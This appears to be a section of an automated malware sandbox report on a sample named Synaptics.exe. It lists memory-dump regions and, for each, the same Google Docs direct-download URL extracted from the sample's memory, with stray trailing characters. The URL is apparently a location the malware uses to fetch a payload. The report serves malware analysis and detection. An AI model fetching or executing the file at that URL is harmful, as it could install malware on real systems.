                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;f
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=E
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?S
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAd8
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBg
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC)
                              Source: Synaptics.exe, 00000002.00000000.408126624.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500942768.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCR
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD(
                              Source: Synaptics.exe, 00000002.00000000.408126624.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500942768.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDU
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDe
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500649438.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.407916229.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377175932.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEE
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGE#Volume#
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGS
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGf
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIB
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadInA
                              Source: Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJd/
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKP
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL)
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLI-
